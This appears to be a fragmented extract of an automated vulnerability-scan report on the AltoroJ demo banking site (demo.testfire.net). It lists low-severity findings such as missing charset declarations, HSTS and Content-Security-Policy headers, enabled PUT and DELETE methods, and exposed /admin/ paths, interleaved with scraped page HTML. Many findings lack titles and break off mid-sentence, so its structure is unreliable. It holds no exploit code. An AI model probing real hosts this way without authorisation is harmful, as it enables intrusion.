Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right">This web application is open source!<span style="color:black;font-style:italic;font-weight:normal;float:right"> <a href="https://github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:8080/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://65.61.137.117:8080/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:8443/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:443/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://demo.testfire.net:8080/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Evidence:
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA256
Remediation:
No remediation is necessary.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
Evidence:
URL: http://demo.testfire.net/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117:8080/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:443/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
Evidence:
URL: https://demo.testfire.net/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
URL: https://65.61.137.117/
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:80/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Example of response header use-
Strict-Transport-Security: max-age=31536000
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net:8443/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://demo.testfire.net:8080/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:80/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"
width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
http://demo.testfire.net/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
If external scripts are necessary to provide a particular service, then get
the scripts from the third party, review them for functionality and
integrity, and post them on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
DetectionDetails: Following External Links Found:
Remediation:
If external scripts are necessary to provide a particular service, then get
the scripts from the third party, review them for functionality and
integrity, and post them on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
420 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: demo.testfire.net
ip_address: 65.61.137.117
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:80/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="
Remediation:
If external scripts are necessary to provide a particular service, then get
the scripts from the third party, review them for functionality and
integrity, and post them on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"
width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://demo.testfire.net:8080/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://65.61.137.117:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
<head>
<title>Altoro Mutual</title>
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170"
height="128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
</td>
</div>
</tr>
</table>
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider using a strict Content-Security-Policy header to
prevent Cross-Site Scripting issues.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://demo.testfire.net/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document based on what's
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://demo.testfire.net/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:443/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Evidence:
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA
Remediation:
No remediation is necessary.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat, apache:tomcat
Evidence:
application_cpe: cpe:/a:apache:tomcat, cpe:/a:apache:tomcat
application_name: apache:tomcat, apache:tomcat
application_protocol: http
ip_address: 65.61.137.117
port_number: 8080
transport_protocol: tcp
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-style:italic;font-weight:normal;float:right">
<a href="https://github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider using a strict Content-Security-Policy header to
prevent Cross-Site Scripting issues.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
During the crawl of the HTTP service, we detected HTML and/or XML
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://demo.testfire.net:8443/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server declare the
correct character set for their encoding. The referenced links describe
the proper ways to indicate the character set encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
this is indicated within the "Content-Type" HTTP header, a 'meta'
http-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document based on what is available. The danger is
that a browser guesses the wrong encoding and misinterprets the
document. In cases where a webpage reflects user-supplied information,
an attacker could provide a specially crafted string that tricks a web
browser into decoding the document as a specific character set. If this
specially crafted string were HTML code encoded in that character set,
the attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://demo.testfire.net:8443/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server declare the
correct character set for their encoding. The referenced links describe
the proper ways to indicate the character set encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:8443/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:8080/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:8080/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
this is indicated within the "Content-Type" HTTP header, a 'meta'
http-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document based on what is available. The danger is
that a browser guesses the wrong encoding and misinterprets the
document. In cases where a webpage reflects user-supplied information,
an attacker could provide a specially crafted string that tricks a web
browser into decoding the document as a specific character set. If this
specially crafted string were HTML code encoded in that character set,
the attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://demo.testfire.net:8080/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server declare the
correct character set for their encoding. The referenced links describe
the proper ways to indicate the character set encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
